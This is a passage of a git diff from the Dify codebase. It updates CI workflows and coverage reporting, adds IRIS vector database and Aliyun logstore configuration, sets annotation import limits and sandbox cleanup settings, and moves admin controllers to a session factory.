b/.github/workflows/api-tests.yml @@ -71,18 +71,18 @@ jobs: run: | cp api/tests/integration_tests/.env.example api/tests/integration_tests/.env - - name: Run Workflow - run: uv run --project api bash dev/pytest/pytest_workflow.sh - - - name: Run Tool - run: uv run --project api bash dev/pytest/pytest_tools.sh - - - name: Run TestContainers - run: uv run --project api bash dev/pytest/pytest_testcontainers.sh - - - name: Run Unit tests + - name: Run API Tests + env: + STORAGE_TYPE: opendal + OPENDAL_SCHEME: fs + OPENDAL_FS_ROOT: /tmp/dify-storage run: | - uv run --project api bash dev/pytest/pytest_unit_tests.sh + uv run --project api pytest \ + --timeout "${PYTEST_TIMEOUT:-180}" \ + api/tests/integration_tests/workflow \ + api/tests/integration_tests/tools \ + api/tests/test_containers_integration_tests \ + api/tests/unit_tests - name: Coverage Summary run: | @@ -93,5 +93,12 @@ jobs: # Create a detailed coverage summary echo "### Test Coverage Summary :test_tube:" >> $GITHUB_STEP_SUMMARY echo "Total Coverage: ${TOTAL_COVERAGE}%" >> $GITHUB_STEP_SUMMARY - uv run --project api coverage report --format=markdown >> $GITHUB_STEP_SUMMARY - + { + echo "" + echo "
File-level coverage (click to expand)" + echo "" + echo '```' + uv run --project api coverage report -m + echo '```' + echo "
" + } >> $GITHUB_STEP_SUMMARY diff --git a/.github/workflows/autofix.yml b/.github/workflows/autofix.yml index 81392a9734..2f457d0a0a 100644 --- a/.github/workflows/autofix.yml +++ b/.github/workflows/autofix.yml @@ -13,11 +13,12 @@ jobs: runs-on: ubuntu-latest steps: - uses: actions/checkout@v4 - - # Use uv to ensure we have the same ruff version in CI and locally. - - uses: astral-sh/setup-uv@v6 + - uses: actions/setup-python@v5 with: python-version: "3.11" + + - uses: astral-sh/setup-uv@v6 + - run: | cd api uv sync --dev @@ -35,10 +36,11 @@ jobs: - name: ast-grep run: | - uvx --from ast-grep-cli sg --pattern 'db.session.query($WHATEVER).filter($HERE)' --rewrite 'db.session.query($WHATEVER).where($HERE)' -l py --update-all - uvx --from ast-grep-cli sg --pattern 'session.query($WHATEVER).filter($HERE)' --rewrite 'session.query($WHATEVER).where($HERE)' -l py --update-all - uvx --from ast-grep-cli sg -p '$A = db.Column($$$B)' -r '$A = mapped_column($$$B)' -l py --update-all - uvx --from ast-grep-cli sg -p '$A : $T = db.Column($$$B)' -r '$A : $T = mapped_column($$$B)' -l py --update-all + # ast-grep exits 1 if no matches are found; allow idempotent runs. + uvx --from ast-grep-cli ast-grep --pattern 'db.session.query($WHATEVER).filter($HERE)' --rewrite 'db.session.query($WHATEVER).where($HERE)' -l py --update-all || true + uvx --from ast-grep-cli ast-grep --pattern 'session.query($WHATEVER).filter($HERE)' --rewrite 'session.query($WHATEVER).where($HERE)' -l py --update-all || true + uvx --from ast-grep-cli ast-grep -p '$A = db.Column($$$B)' -r '$A = mapped_column($$$B)' -l py --update-all || true + uvx --from ast-grep-cli ast-grep -p '$A : $T = db.Column($$$B)' -r '$A : $T = mapped_column($$$B)' -l py --update-all || true # Convert Optional[T] to T | None (ignoring quoted types) cat > /tmp/optional-rule.yml << 'EOF' id: convert-optional-to-union @@ -56,14 +58,15 @@ jobs: pattern: $T fix: $T | None EOF - uvx --from ast-grep-cli sg scan --inline-rules "$(cat /tmp/optional-rule.yml)" --update-all + uvx --from ast-grep-cli ast-grep scan . --inline-rules "$(cat /tmp/optional-rule.yml)" --update-all # Fix forward references that were incorrectly converted (Python doesn't support "Type" | None syntax) find . -name "*.py" -type f -exec sed -i.bak -E 's/"([^"]+)" \| None/Optional["\1"]/g; s/'"'"'([^'"'"']+)'"'"' \| None/Optional['"'"'\1'"'"']/g' {} \; find . -name "*.py.bak" -type f -delete + # mdformat breaks YAML front matter in markdown files. Add --exclude for directories containing YAML front matter. - name: mdformat run: | - uvx mdformat . + uvx --python 3.13 mdformat . --exclude ".claude/skills/**" - name: Install pnpm uses: pnpm/action-setup@v4 @@ -76,7 +79,7 @@ jobs: with: node-version: 22 cache: pnpm - cache-dependency-path: ./web/package.json + cache-dependency-path: ./web/pnpm-lock.yaml - name: Web dependencies working-directory: ./web @@ -84,7 +87,6 @@ jobs: - name: oxlint working-directory: ./web - run: | - pnpx oxlint --fix + run: pnpm exec oxlint --config .oxlintrc.json --fix . - uses: autofix-ci/action@635ffb0c9798bd160680f18fd73371e355b85f27 diff --git a/.github/workflows/style.yml b/.github/workflows/style.yml index 5a8a34be79..2fb8121f74 100644 --- a/.github/workflows/style.yml +++ b/.github/workflows/style.yml @@ -90,7 +90,7 @@ jobs: with: node-version: 22 cache: pnpm - cache-dependency-path: ./web/package.json + cache-dependency-path: ./web/pnpm-lock.yaml - name: Web dependencies if: steps.changed-files.outputs.any_changed == 'true' diff --git a/.github/workflows/translate-i18n-base-on-english.yml b/.github/workflows/translate-i18n-base-on-english.yml index fe8e2ebc2b..8bb82d5d44 100644 --- a/.github/workflows/translate-i18n-base-on-english.yml +++ b/.github/workflows/translate-i18n-base-on-english.yml @@ -55,7 +55,7 @@ jobs: with: node-version: 'lts/*' cache: pnpm - cache-dependency-path: ./web/package.json + cache-dependency-path: ./web/pnpm-lock.yaml - name: Install dependencies if: env.FILES_CHANGED == 'true' diff --git a/.github/workflows/web-tests.yml b/.github/workflows/web-tests.yml index 3313e58614..b1f32f96c2 100644 --- a/.github/workflows/web-tests.yml +++ b/.github/workflows/web-tests.yml @@ -13,6 +13,7 @@ jobs: runs-on: ubuntu-latest defaults: run: + shell: bash working-directory: ./web steps: @@ -21,14 +22,7 @@ jobs: with: persist-credentials: false - - name: Check changed files - id: changed-files - uses: tj-actions/changed-files@v46 - with: - files: web/** - - name: Install pnpm - if: steps.changed-files.outputs.any_changed == 'true' uses: pnpm/action-setup@v4 with: package_json_file: web/package.json @@ -36,23 +30,355 @@ jobs: - name: Setup Node.js uses: actions/setup-node@v4 - if: steps.changed-files.outputs.any_changed == 'true' with: node-version: 22 cache: pnpm - cache-dependency-path: ./web/package.json + cache-dependency-path: ./web/pnpm-lock.yaml + + - name: Restore Jest cache + uses: actions/cache@v4 + with: + path: web/.cache/jest + key: ${{ runner.os }}-jest-${{ hashFiles('web/pnpm-lock.yaml') }} + restore-keys: | + ${{ runner.os }}-jest- - name: Install dependencies - if: steps.changed-files.outputs.any_changed == 'true' - working-directory: ./web run: pnpm install --frozen-lockfile - name: Check i18n types synchronization - if: steps.changed-files.outputs.any_changed == 'true' - working-directory: ./web run: pnpm run check:i18n-types - name: Run tests - if: steps.changed-files.outputs.any_changed == 'true' - working-directory: ./web - run: pnpm test + run: | + pnpm exec jest \ + --ci \ + --maxWorkers=100% \ + --coverage \ + --passWithNoTests + + - name: Coverage Summary + if: always() + id: coverage-summary + run: | + set -eo pipefail + + COVERAGE_FILE="coverage/coverage-final.json" + COVERAGE_SUMMARY_FILE="coverage/coverage-summary.json" + + if [ ! -f "$COVERAGE_FILE" ] && [ ! -f "$COVERAGE_SUMMARY_FILE" ]; then + echo "has_coverage=false" >> "$GITHUB_OUTPUT" + echo "### 🚨 Test Coverage Report :test_tube:" >> "$GITHUB_STEP_SUMMARY" + echo "Coverage data not found. Ensure Jest runs with coverage enabled." >> "$GITHUB_STEP_SUMMARY" + exit 0 + fi + + echo "has_coverage=true" >> "$GITHUB_OUTPUT" + + node <<'NODE' >> "$GITHUB_STEP_SUMMARY" + const fs = require('fs'); + const path = require('path'); + let libCoverage = null; + + try { + libCoverage = require('istanbul-lib-coverage'); + } catch (error) { + libCoverage = null; + } + + const summaryPath = path.join('coverage', 'coverage-summary.json'); + const finalPath = path.join('coverage', 'coverage-final.json'); + + const hasSummary = fs.existsSync(summaryPath); + const hasFinal = fs.existsSync(finalPath); + + if (!hasSummary && !hasFinal) { + console.log('### Test Coverage Summary :test_tube:'); + console.log(''); + console.log('No coverage data found.'); + process.exit(0); + } + + const summary = hasSummary + ? JSON.parse(fs.readFileSync(summaryPath, 'utf8')) + : null; + const coverage = hasFinal + ? JSON.parse(fs.readFileSync(finalPath, 'utf8')) + : null; + + const getLineCoverageFromStatements = (statementMap, statementHits) => { + const lineHits = {}; + + if (!statementMap || !statementHits) { + return lineHits; + } + + Object.entries(statementMap).forEach(([key, statement]) => { + const line = statement?.start?.line; + if (!line) { + return; + } + const hits = statementHits[key] ?? 0; + const previous = lineHits[line]; + lineHits[line] = previous === undefined ? hits : Math.max(previous, hits); + }); + + return lineHits; + }; + + const getFileCoverage = (entry) => ( + libCoverage ? libCoverage.createFileCoverage(entry) : null + ); + + const getLineHits = (entry, fileCoverage) => { + const lineHits = entry.l ?? {}; + if (Object.keys(lineHits).length > 0) { + return lineHits; + } + if (fileCoverage) { + return fileCoverage.getLineCoverage(); + } + return getLineCoverageFromStatements(entry.statementMap ?? {}, entry.s ?? {}); + }; + + const getUncoveredLines = (entry, fileCoverage, lineHits) => { + if (lineHits && Object.keys(lineHits).length > 0) { + return Object.entries(lineHits) + .filter(([, count]) => count === 0) + .map(([line]) => Number(line)) + .sort((a, b) => a - b); + } + if (fileCoverage) { + return fileCoverage.getUncoveredLines(); + } + return []; + }; + + const totals = { + lines: { covered: 0, total: 0 }, + statements: { covered: 0, total: 0 }, + branches: { covered: 0, total: 0 }, + functions: { covered: 0, total: 0 }, + }; + const fileSummaries = []; + + if (summary) { + const totalEntry = summary.total ?? {}; + ['lines', 'statements', 'branches', 'functions'].forEach((key) => { + if (totalEntry[key]) { + totals[key].covered = totalEntry[key].covered ?? 0; + totals[key].total = totalEntry[key].total ?? 0; + } + }); + + Object.entries(summary) + .filter(([file]) => file !== 'total') + .forEach(([file, data]) => { + fileSummaries.push({ + file, + pct: data.lines?.pct ?? data.statements?.pct ?? 0, + lines: { + covered: data.lines?.covered ?? 0, + total: data.lines?.total ?? 0, + }, + }); + }); + } else if (coverage) { + Object.entries(coverage).forEach(([file, entry]) => { + const fileCoverage = getFileCoverage(entry); + const lineHits = getLineHits(entry, fileCoverage); + const statementHits = entry.s ?? {}; + const branchHits = entry.b ?? {}; + const functionHits = entry.f ?? {}; + + const lineTotal = Object.keys(lineHits).length; + const lineCovered = Object.values(lineHits).filter((n) => n > 0).length; + + const statementTotal = Object.keys(statementHits).length; + const statementCovered = Object.values(statementHits).filter((n) => n > 0).length; + + const branchTotal = Object.values(branchHits).reduce((acc, branches) => acc + branches.length, 0); + const branchCovered = Object.values(branchHits).reduce( + (acc, branches) => acc + branches.filter((n) => n > 0).length, + 0, + ); + + const functionTotal = Object.keys(functionHits).length; + const functionCovered = Object.values(functionHits).filter((n) => n > 0).length; + + totals.lines.total += lineTotal; + totals.lines.covered += lineCovered; + totals.statements.total += statementTotal; + totals.statements.covered += statementCovered; + totals.branches.total += branchTotal; + totals.branches.covered += branchCovered; + totals.functions.total += functionTotal; + totals.functions.covered += functionCovered; + + const pct = (covered, tot) => (tot > 0 ? (covered / tot) * 100 : 0); + + fileSummaries.push({ + file, + pct: pct(lineCovered || statementCovered, lineTotal || statementTotal), + lines: { + covered: lineCovered || statementCovered, + total: lineTotal || statementTotal, + }, + }); + }); + } + + const pct = (covered, tot) => (tot > 0 ? ((covered / tot) * 100).toFixed(2) : '0.00'); + + console.log('### Test Coverage Summary :test_tube:'); + console.log(''); + console.log('| Metric | Coverage | Covered / Total |'); + console.log('|--------|----------|-----------------|'); + console.log(`| Lines | ${pct(totals.lines.covered, totals.lines.total)}% | ${totals.lines.covered} / ${totals.lines.total} |`); + console.log(`| Statements | ${pct(totals.statements.covered, totals.statements.total)}% | ${totals.statements.covered} / ${totals.statements.total} |`); + console.log(`| Branches | ${pct(totals.branches.covered, totals.branches.total)}% | ${totals.branches.covered} / ${totals.branches.total} |`); + console.log(`| Functions | ${pct(totals.functions.covered, totals.functions.total)}% | ${totals.functions.covered} / ${totals.functions.total} |`); + + console.log(''); + console.log('
File coverage (lowest lines first)'); + console.log(''); + console.log('```'); + fileSummaries + .sort((a, b) => (a.pct - b.pct) || (b.lines.total - a.lines.total)) + .slice(0, 25) + .forEach(({ file, pct, lines }) => { + console.log(`${pct.toFixed(2)}%\t${lines.covered}/${lines.total}\t${file}`); + }); + console.log('```'); + console.log('
'); + + if (coverage) { + const pctValue = (covered, tot) => { + if (tot === 0) { + return '0'; + } + return ((covered / tot) * 100) + .toFixed(2) + .replace(/\.?0+$/, ''); + }; + + const formatLineRanges = (lines) => { + if (lines.length === 0) { + return ''; + } + const ranges = []; + let start = lines[0]; + let end = lines[0]; + + for (let i = 1; i < lines.length; i += 1) { + const current = lines[i]; + if (current === end + 1) { + end = current; + continue; + } + ranges.push(start === end ? `${start}` : `${start}-${end}`); + start = current; + end = current; + } + ranges.push(start === end ? `${start}` : `${start}-${end}`); + return ranges.join(','); + }; + + const tableTotals = { + statements: { covered: 0, total: 0 }, + branches: { covered: 0, total: 0 }, + functions: { covered: 0, total: 0 }, + lines: { covered: 0, total: 0 }, + }; + const tableRows = Object.entries(coverage) + .map(([file, entry]) => { + const fileCoverage = getFileCoverage(entry); + const lineHits = getLineHits(entry, fileCoverage); + const statementHits = entry.s ?? {}; + const branchHits = entry.b ?? {}; + const functionHits = entry.f ?? {}; + + const lineTotal = Object.keys(lineHits).length; + const lineCovered = Object.values(lineHits).filter((n) => n > 0).length; + const statementTotal = Object.keys(statementHits).length; + const statementCovered = Object.values(statementHits).filter((n) => n > 0).length; + const branchTotal = Object.values(branchHits).reduce((acc, branches) => acc + branches.length, 0); + const branchCovered = Object.values(branchHits).reduce( + (acc, branches) => acc + branches.filter((n) => n > 0).length, + 0, + ); + const functionTotal = Object.keys(functionHits).length; + const functionCovered = Object.values(functionHits).filter((n) => n > 0).length; + + tableTotals.lines.total += lineTotal; + tableTotals.lines.covered += lineCovered; + tableTotals.statements.total += statementTotal; + tableTotals.statements.covered += statementCovered; + tableTotals.branches.total += branchTotal; + tableTotals.branches.covered += branchCovered; + tableTotals.functions.total += functionTotal; + tableTotals.functions.covered += functionCovered; + + const uncoveredLines = getUncoveredLines(entry, fileCoverage, lineHits); + + const filePath = entry.path ?? file; + const relativePath = path.isAbsolute(filePath) + ? path.relative(process.cwd(), filePath) + : filePath; + + return { + file: relativePath || file, + statements: pctValue(statementCovered, statementTotal), + branches: pctValue(branchCovered, branchTotal), + functions: pctValue(functionCovered, functionTotal), + lines: pctValue(lineCovered, lineTotal), + uncovered: formatLineRanges(uncoveredLines), + }; + }) + .sort((a, b) => a.file.localeCompare(b.file)); + + const columns = [ + { key: 'file', header: 'File', align: 'left' }, + { key: 'statements', header: '% Stmts', align: 'right' }, + { key: 'branches', header: '% Branch', align: 'right' }, + { key: 'functions', header: '% Funcs', align: 'right' }, + { key: 'lines', header: '% Lines', align: 'right' }, + { key: 'uncovered', header: 'Uncovered Line #s', align: 'left' }, + ]; + + const allFilesRow = { + file: 'All files', + statements: pctValue(tableTotals.statements.covered, tableTotals.statements.total), + branches: pctValue(tableTotals.branches.covered, tableTotals.branches.total), + functions: pctValue(tableTotals.functions.covered, tableTotals.functions.total), + lines: pctValue(tableTotals.lines.covered, tableTotals.lines.total), + uncovered: '', + }; + + const rowsForOutput = [allFilesRow, ...tableRows]; + const formatRow = (row) => `| ${columns + .map(({ key }) => String(row[key] ?? '')) + .join(' | ')} |`; + const headerRow = `| ${columns.map(({ header }) => header).join(' | ')} |`; + const dividerRow = `| ${columns + .map(({ align }) => (align === 'right' ? '---:' : ':---')) + .join(' | ')} |`; + + console.log(''); + console.log('
Jest coverage table'); + console.log(''); + console.log(headerRow); + console.log(dividerRow); + rowsForOutput.forEach((row) => console.log(formatRow(row))); + console.log('
'); + } + NODE + + - name: Upload Coverage Artifact + if: steps.coverage-summary.outputs.has_coverage == 'true' + uses: actions/upload-artifact@v4 + with: + name: web-coverage-report + path: web/coverage + retention-days: 30 + if-no-files-found: error diff --git a/.gitignore b/.gitignore index 79ba44b207..5ad728c3da 100644 --- a/.gitignore +++ b/.gitignore @@ -189,6 +189,7 @@ docker/volumes/matrixone/* docker/volumes/mysql/* docker/volumes/seekdb/* !docker/volumes/oceanbase/init.d +docker/volumes/iris/* docker/nginx/conf.d/default.conf docker/nginx/ssl/* diff --git a/.vscode/launch.json.template b/.vscode/launch.json.template index cb934d01b5..bdded1e73e 100644 --- a/.vscode/launch.json.template +++ b/.vscode/launch.json.template @@ -37,7 +37,7 @@ "-c", "1", "-Q", - "dataset,priority_dataset,priority_pipeline,pipeline,mail,ops_trace,app_deletion,plugin,workflow_storage,conversation,workflow,schedule_poller,schedule_executor,triggered_workflow_dispatcher,trigger_refresh_executor", + "dataset,priority_dataset,priority_pipeline,pipeline,mail,ops_trace,app_deletion,plugin,workflow_storage,conversation,workflow,schedule_poller,schedule_executor,triggered_workflow_dispatcher,trigger_refresh_executor,retention", "--loglevel", "INFO" ], diff --git a/.windsurf/rules/testing.md b/.windsurf/rules/testing.md deleted file mode 100644 index 64fec20cb8..0000000000 --- a/.windsurf/rules/testing.md +++ /dev/null @@ -1,5 +0,0 @@ -# Windsurf Testing Rules - -- Use `web/testing/testing.md` as the single source of truth for frontend automated testing. -- Honor every requirement in that document when generating or accepting tests. -- When proposing or saving tests, re-read that document and follow every requirement. diff --git a/api/.env.example b/api/.env.example index 516a119d98..b87d9c7b02 100644 --- a/api/.env.example +++ b/api/.env.example @@ -543,6 +543,25 @@ APP_MAX_EXECUTION_TIME=1200 APP_DEFAULT_ACTIVE_REQUESTS=0 APP_MAX_ACTIVE_REQUESTS=0 +# Aliyun SLS Logstore Configuration +# Aliyun Access Key ID +ALIYUN_SLS_ACCESS_KEY_ID= +# Aliyun Access Key Secret +ALIYUN_SLS_ACCESS_KEY_SECRET= +# Aliyun SLS Endpoint (e.g., cn-hangzhou.log.aliyuncs.com) +ALIYUN_SLS_ENDPOINT= +# Aliyun SLS Region (e.g., cn-hangzhou) +ALIYUN_SLS_REGION= +# Aliyun SLS Project Name +ALIYUN_SLS_PROJECT_NAME= +# Number of days to retain workflow run logs (default: 365 days, 3650 for permanent storage) +ALIYUN_SLS_LOGSTORE_TTL=365 +# Enable dual-write to both SLS LogStore and SQL database (default: false) +LOGSTORE_DUAL_WRITE_ENABLED=false +# Enable dual-read fallback to SQL database when LogStore returns no results (default: true) +# Useful for migration scenarios where historical data exists only in SQL database +LOGSTORE_DUAL_READ_ENABLED=true + # Celery beat configuration CELERY_BEAT_SCHEDULER_TIME=1 @@ -660,3 +679,19 @@ SINGLE_CHUNK_ATTACHMENT_LIMIT=10 ATTACHMENT_IMAGE_FILE_SIZE_LIMIT=2 ATTACHMENT_IMAGE_DOWNLOAD_TIMEOUT=60 IMAGE_FILE_BATCH_LIMIT=10 + +# Maximum allowed CSV file size for annotation import in megabytes +ANNOTATION_IMPORT_FILE_SIZE_LIMIT=2 +#Maximum number of annotation records allowed in a single import +ANNOTATION_IMPORT_MAX_RECORDS=10000 +# Minimum number of annotation records required in a single import +ANNOTATION_IMPORT_MIN_RECORDS=1 +ANNOTATION_IMPORT_RATE_LIMIT_PER_MINUTE=5 +ANNOTATION_IMPORT_RATE_LIMIT_PER_HOUR=20 +# Maximum number of concurrent annotation import tasks per tenant +ANNOTATION_IMPORT_MAX_CONCURRENT=5 + +# Sandbox expired records clean configuration +SANDBOX_EXPIRED_RECORDS_CLEAN_GRACEFUL_PERIOD=21 +SANDBOX_EXPIRED_RECORDS_CLEAN_BATCH_SIZE=1000 +SANDBOX_EXPIRED_RECORDS_RETENTION_DAYS=30 diff --git a/api/README.md b/api/README.md index 2dab2ec6e6..794b05d3af 100644 --- a/api/README.md +++ b/api/README.md @@ -84,7 +84,7 @@ 1. If you need to handle and debug the async tasks (e.g. dataset importing and documents indexing), please start the worker service. ```bash -uv run celery -A app.celery worker -P threads -c 2 --loglevel INFO -Q dataset,priority_dataset,priority_pipeline,pipeline,mail,ops_trace,app_deletion,plugin,workflow_storage,conversation,workflow,schedule_poller,schedule_executor,triggered_workflow_dispatcher,trigger_refresh_executor +uv run celery -A app.celery worker -P threads -c 2 --loglevel INFO -Q dataset,priority_dataset,priority_pipeline,pipeline,mail,ops_trace,app_deletion,plugin,workflow_storage,conversation,workflow,schedule_poller,schedule_executor,triggered_workflow_dispatcher,trigger_refresh_executor,retention ``` Additionally, if you want to debug the celery scheduled tasks, you can run the following command in another terminal to start the beat service: diff --git a/api/app_factory.py b/api/app_factory.py index 3a3ee03cff..bcad88e9e0 100644 --- a/api/app_factory.py +++ b/api/app_factory.py @@ -75,6 +75,7 @@ def initialize_extensions(app: DifyApp): ext_import_modules, ext_logging, ext_login, + ext_logstore, ext_mail, ext_migrate, ext_orjson, @@ -83,6 +84,7 @@ def initialize_extensions(app: DifyApp): ext_redis, ext_request_logging, ext_sentry, + ext_session_factory, ext_set_secretkey, ext_storage, ext_timezone, @@ -104,6 +106,7 @@ def initialize_extensions(app: DifyApp): ext_migrate, ext_redis, ext_storage, + ext_logstore, # Initialize logstore after storage, before celery ext_celery, ext_login, ext_mail, @@ -114,6 +117,7 @@ def initialize_extensions(app: DifyApp): ext_commands, ext_otel, ext_request_logging, + ext_session_factory, ] for ext in extensions: short_name = ext.__name__.split(".")[-1] diff --git a/api/configs/feature/__init__.py b/api/configs/feature/__init__.py index a5916241df..43dddbd011 100644 --- a/api/configs/feature/__init__.py +++ b/api/configs/feature/__init__.py @@ -218,7 +218,7 @@ class PluginConfig(BaseSettings): PLUGIN_DAEMON_TIMEOUT: PositiveFloat | None = Field( description="Timeout in seconds for requests to the plugin daemon (set to None to disable)", - default=300.0, + default=600.0, ) INNER_API_KEY_FOR_PLUGIN: str = Field(description="Inner api key for plugin", default="inner-api-key") @@ -380,6 +380,37 @@ class FileUploadConfig(BaseSettings): default=60, ) + # Annotation Import Security Configurations + ANNOTATION_IMPORT_FILE_SIZE_LIMIT: NonNegativeInt = Field( + description="Maximum allowed CSV file size for annotation import in megabytes", + default=2, + ) + + ANNOTATION_IMPORT_MAX_RECORDS: PositiveInt = Field( + description="Maximum number of annotation records allowed in a single import", + default=10000, + ) + + ANNOTATION_IMPORT_MIN_RECORDS: PositiveInt = Field( + description="Minimum number of annotation records required in a single import", + default=1, + ) + + ANNOTATION_IMPORT_RATE_LIMIT_PER_MINUTE: PositiveInt = Field( + description="Maximum number of annotation import requests per minute per tenant", + default=5, + ) + + ANNOTATION_IMPORT_RATE_LIMIT_PER_HOUR: PositiveInt = Field( + description="Maximum number of annotation import requests per hour per tenant", + default=20, + ) + + ANNOTATION_IMPORT_MAX_CONCURRENT: PositiveInt = Field( + description="Maximum number of concurrent annotation import tasks per tenant", + default=2, + ) + inner_UPLOAD_FILE_EXTENSION_BLACKLIST: str = Field( description=( "Comma-separated list of file extensions that are blocked from upload. " @@ -1239,6 +1270,21 @@ class TenantIsolatedTaskQueueConfig(BaseSettings): ) +class SandboxExpiredRecordsCleanConfig(BaseSettings): + SANDBOX_EXPIRED_RECORDS_CLEAN_GRACEFUL_PERIOD: NonNegativeInt = Field( + description="Graceful period in days for sandbox records clean after subscription expiration", + default=21, + ) + SANDBOX_EXPIRED_RECORDS_CLEAN_BATCH_SIZE: PositiveInt = Field( + description="Maximum number of records to process in each batch", + default=1000, + ) + SANDBOX_EXPIRED_RECORDS_RETENTION_DAYS: PositiveInt = Field( + description="Retention days for sandbox expired workflow_run records and message records", + default=30, + ) + + class FeatureConfig( # place the configs in alphabet order AppExecutionConfig, @@ -1264,6 +1310,7 @@ class FeatureConfig( PositionConfig, RagEtlConfig, RepositoryConfig, + SandboxExpiredRecordsCleanConfig, SecurityConfig, TenantIsolatedTaskQueueConfig, ToolConfig, diff --git a/api/configs/middleware/__init__.py b/api/configs/middleware/__init__.py index a5e35c99ca..63f75924bf 100644 --- a/api/configs/middleware/__init__.py +++ b/api/configs/middleware/__init__.py @@ -26,6 +26,7 @@ from .vdb.clickzetta_config import ClickzettaConfig from .vdb.couchbase_config import CouchbaseConfig from .vdb.elasticsearch_config import ElasticsearchConfig from .vdb.huawei_cloud_config import HuaweiCloudConfig +from .vdb.iris_config import IrisVectorConfig from .vdb.lindorm_config import LindormConfig from .vdb.matrixone_config import MatrixoneConfig from .vdb.milvus_config import MilvusConfig @@ -106,7 +107,7 @@ class KeywordStoreConfig(BaseSettings): class DatabaseConfig(BaseSettings): # Database type selector - DB_TYPE: Literal["postgresql", "mysql", "oceanbase"] = Field( + DB_TYPE: Literal["postgresql", "mysql", "oceanbase", "seekdb"] = Field( description="Database type to use. OceanBase is MySQL-compatible.", default="postgresql", ) @@ -336,6 +337,7 @@ class MiddlewareConfig( ChromaConfig, ClickzettaConfig, HuaweiCloudConfig, + IrisVectorConfig, MilvusConfig, AlibabaCloudMySQLConfig, MyScaleConfig, diff --git a/api/configs/middleware/vdb/iris_config.py b/api/configs/middleware/vdb/iris_config.py new file mode 100644 index 0000000000..c532d191c3 --- /dev/null +++ b/api/configs/middleware/vdb/iris_config.py @@ -0,0 +1,91 @@ +"""Configuration for InterSystems IRIS vector database.""" + +from pydantic import Field, PositiveInt, model_validator +from pydantic_settings import BaseSettings + + +class IrisVectorConfig(BaseSettings): + """Configuration settings for IRIS vector database connection and pooling.""" + + IRIS_HOST: str | None = Field( + description="Hostname or IP address of the IRIS server.", + default="localhost", + ) + + IRIS_SUPER_SERVER_PORT: PositiveInt | None = Field( + description="Port number for IRIS connection.", + default=1972, + ) + + IRIS_USER: str | None = Field( + description="Username for IRIS authentication.", + default="_SYSTEM", + ) + + IRIS_PASSWORD: str | None = Field( + description="Password for IRIS authentication.", + default="Dify@1234", + ) + + IRIS_SCHEMA: str | None = Field( + description="Schema name for IRIS tables.", + default="dify", + ) + + IRIS_DATABASE: str | None = Field( + description="Database namespace for IRIS connection.", + default="USER", + ) + + IRIS_CONNECTION_URL: str | None = Field( + description="Full connection URL for IRIS (overrides individual fields if provided).", + default=None, + ) + + IRIS_MIN_CONNECTION: PositiveInt = Field( + description="Minimum number of connections in the pool.", + default=1, + ) + + IRIS_MAX_CONNECTION: PositiveInt = Field( + description="Maximum number of connections in the pool.", + default=3, + ) + + IRIS_TEXT_INDEX: bool = Field( + description="Enable full-text search index using %iFind.Index.Basic.", + default=True, + ) + + IRIS_TEXT_INDEX_LANGUAGE: str = Field( + description="Language for full-text search index (e.g., 'en', 'ja', 'zh', 'de').", + default="en", + ) + + @model_validator(mode="before") + @classmethod + def validate_config(cls, values: dict) -> dict: + """Validate IRIS configuration values. + + Args: + values: Configuration dictionary + + Returns: + Validated configuration dictionary + + Raises: + ValueError: If required fields are missing or pool settings are invalid + """ + # Only validate required fields if IRIS is being used as the vector store + # This allows the config to be loaded even when IRIS is not in use + + # vector_store = os.environ.get("VECTOR_STORE", "") + # We rely on Pydantic defaults for required fields if they are missing from env. + # Strict existence check is removed to allow defaults to work. + + min_conn = values.get("IRIS_MIN_CONNECTION", 1) + max_conn = values.get("IRIS_MAX_CONNECTION", 3) + if min_conn > max_conn: + raise ValueError("IRIS_MIN_CONNECTION must be less than or equal to IRIS_MAX_CONNECTION") + + return values diff --git a/api/constants/languages.py b/api/constants/languages.py index 0312a558c9..8c1ce368ac 100644 --- a/api/constants/languages.py +++ b/api/constants/languages.py @@ -20,6 +20,7 @@ language_timezone_mapping = { "sl-SI": "Europe/Ljubljana", "th-TH": "Asia/Bangkok", "id-ID": "Asia/Jakarta", + "ar-TN": "Africa/Tunis", } languages = list(language_timezone_mapping.keys()) diff --git a/api/controllers/console/admin.py b/api/controllers/console/admin.py index 7aa1e6dbd8..a25ca5ef51 100644 --- a/api/controllers/console/admin.py +++ b/api/controllers/console/admin.py @@ -6,19 +6,20 @@ from flask import request from flask_restx import Resource from pydantic import BaseModel, Field, field_validator from sqlalchemy import select -from sqlalchemy.orm import Session from werkzeug.exceptions import NotFound, Unauthorized -P = ParamSpec("P") -R = TypeVar("R") from configs import dify_config from constants.languages import supported_language from controllers.console import console_ns from controllers.console.wraps import only_edition_cloud +from core.db.session_factory import session_factory from extensions.ext_database import db from libs.token import extract_access_token from models.model import App, InstalledApp, RecommendedApp +P = ParamSpec("P") +R = TypeVar("R") + DEFAULT_REF_TEMPLATE_SWAGGER_2_0 = "#/definitions/{model}" @@ -90,7 +91,7 @@ class InsertExploreAppListApi(Resource): privacy_policy = site.privacy_policy or payload.privacy_policy or "" custom_disclaimer = site.custom_disclaimer or payload.custom_disclaimer or "" - with Session(db.engine) as session: + with session_factory.create_session() as session: recommended_app = session.execute( select(RecommendedApp).where(RecommendedApp.app_id == payload.app_id) ).scalar_one_or_none() @@ -138,7 +139,7 @@ class InsertExploreAppApi(Resource): @only_edition_cloud @admin_required def delete(self, app_id): - with Session(db.engine) as session: + with session_factory.create_session() as session: recommended_app = session.execute( select(RecommendedApp).where(RecommendedApp.app_id == str(app_id)) ).scalar_one_or_none() @@ -146,13 +147,13 @@ class InsertExploreAppApi(Resource): if not recommended_app: return {"result": "success"}, 204 - with Session(db.engine) as session: + with session_factory.create_session() as session: app = session.execute(select(App).where(App.id == recommended_app.app_id)).scalar_one_or_none() if app: app.is_public = False - with Session(db.engine) as session: + with session_factory.create_session() as session: installed_apps = ( session.execute( select(InstalledApp).where( diff --git a/api/controllers/console/app/annotation.py b/api/controllers/console/app/annotation.py index 3b6fb58931..6a4c1528b0 100644 --- a/api/controllers/console/app/annotation.py +++ b/api/controllers/console/app/annotation.py @@ -1,6 +1,6 @@ from typing import Any, Literal -from flask import request +from flask import abort, make_response, request from flask_restx import Resource, fields, marshal, marshal_with from pydantic import BaseModel, Field, field_validator @@ -8,6 +8,8 @@ from controllers.common.errors import NoFileUploadedError, TooManyFilesError from controllers.console import console_ns from controllers.console.wraps import ( account_initialization_required, + annotation_import_concurrency_limit, + annotation_import_rate_limit, cloud_edition_billing_resource_check, edit_permission_required, setup_required, @@ -257,7 +259,7 @@ class AnnotationApi(Resource): @console_ns.route("/apps//annotations/export") class 